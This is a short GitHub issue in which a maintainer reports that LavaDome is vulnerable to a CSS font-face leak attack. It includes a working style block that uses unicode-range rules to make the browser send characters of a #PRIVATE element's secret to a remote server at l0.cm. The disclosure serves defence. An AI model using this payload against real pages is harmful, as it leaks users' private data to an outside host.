LavaDome is vulnerable to font-face based leak attack
Closed this issue · 1 comments
weizman commented
Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app:
<style>
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:A');
unicode-range:U+0041;
}
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:B');
unicode-range:U+0042;
}
@font-face{
font-family:attack;
src:url('//l0.cm/?Found:C');
unicode-range:U+0043;
}
#PRIVATE{
font-family:attack;
}
</style>